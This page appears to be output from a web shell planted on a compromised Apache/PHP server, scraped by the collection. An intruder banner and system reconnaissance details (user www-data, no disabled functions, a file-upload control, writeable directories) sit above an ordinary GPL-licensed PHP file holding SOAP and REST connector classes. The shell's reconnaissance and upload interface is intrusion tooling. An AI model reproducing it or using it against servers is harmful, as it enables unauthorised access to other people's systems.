Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/erp/htdocs/custom/abricot/includes/class/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/erp/htdocs/custom/abricot/includes/class/class.soap.php
<?php

/*
 Copyright (C) 2013-2015 ATM Consulting <support@atm-consulting.fr>

 This program and all files within this directory and sub directory
 is free software: you can redistribute it and/or modify it under 
 the terms of the GNU General Public License as published by the 
 Free Software Foundation, either version 3 of the License, or any 
 later version.
 
 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.
 
 You should have received a copy of the GNU General Public License
 along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */


class TSOAPCoreConnector {
	
	function __construct($soapWSDL, $login, $password) {
		$this->login  = $login;
		$this->password = $password;
		
		$this->soap = new SoapClient($soapWSDL);
	
	}
	public function call($function, $params=array()) {
		return $this->soap->{$function}($this->login, $this->password);
	}
	function getFonctionListe() {
		print '<pre>';	
		var_dump($this->soap->__getFunctions());
		print '</pre>';
	}
}


class TRESTCoreConnector {
	function __construct() {
			$this->typeOut='xml';
	}
	public function url($url) {
		$this->_url = $url;
		return $this;
	}
   public function get($pParams = array())
   {
      return $this->out($this->_launch($this->_makeUrl($pParams),
                            $this->_createContext('GET')));
   }
 
   public function create($pPostParams=array(), $pGetParams = array())
   {
      return $this->out($this->_launch($this->_makeUrl($pGetParams),
                            $this->_createContext('POST', $pPostParams)));
   }
    
   public function update($pContent = null, $pGetParams = array())
   {
      return $this->out($this->_launch($this->_makeUrl($pGetParams),
                            $this->_createContext('PUT', $pContent)));
   }
    
   public function delete($pContent = null, $pGetParams = array())
   {
      return $this->out($this->_launch($this->_makeUrl($pGetParams),
                            $this->_createContext('DELETE', $pContent)));
   }
  private function xml2array($xml) {
	  $arr = array();
	  foreach ($xml as $element) {
	    $tag = $element->getName();
	    $e = get_object_vars($element);
	    if (!empty($e)) {
	      $arr[$tag] = $element instanceof SimpleXMLElement ? $this->xml2array($element) : $e;
	    }
	    else {
	      $arr[$tag] = trim($element);
	    }
	  }
	  return $arr;
   }
   private function out($data) {
   		
		if($this->typeOut=='array') {
			$Tab=$this->xml2array(simplexml_load_string($data['content']));
			
			return $Tab;
		}
		else {
			return simplexml_load_string($data['content']);	
		}
		
	
   }    
	
   protected function _createContext($pMethod, $pContent = null)
   {
      $opts = array(
              'http'=>array(
                            'method'=>$pMethod,
                            'header'=>'Content-type: application/x-www-form-urlencoded',
                          )
      );
      if ($pContent !== null){
         if (is_array($pContent)){
            $pContent = http_build_query($pContent);
         }
         $opts['http']['content'] = $pContent;
      }
      return stream_context_create($opts);
   }
    
   protected function _makeUrl($pParams)
   {
      return $this->_url
             .(strpos($this->_url, '?') ? '' : '?')
             .http_build_query($pParams);
   }
    
   protected function _launch ($pUrl, $context)
   {
   	//print $pUrl;
      if (($stream = fopen($pUrl, 'r', false, $context)) !== false){
         $content = stream_get_contents($stream);
         $header = stream_get_meta_data($stream);
         fclose($stream);
         return array('content'=>$content, 'header'=>$header);
        }else{
         return false;
        }
   }
   
   function getFonctionListe() {
		$xml = simplexml_load_string( file_get_contents( $this->_url ) );
		
		?>
		<ul>
		<?php
		
		foreach($xml->api->children() as $module=>$more) {
			?><li><strong><?php echo $module."</strong> ". htmlentities($more->asXML()); ?></li><?php 
		}
		
		?>
		</ul>
		<?php
   }
   function asArray() {
   		$this->typeOut='array';
	
		return $this;
   }	
   function asXML() {
   		$this->typeOut='xml';
	
		return $this;
   }	
}

Hry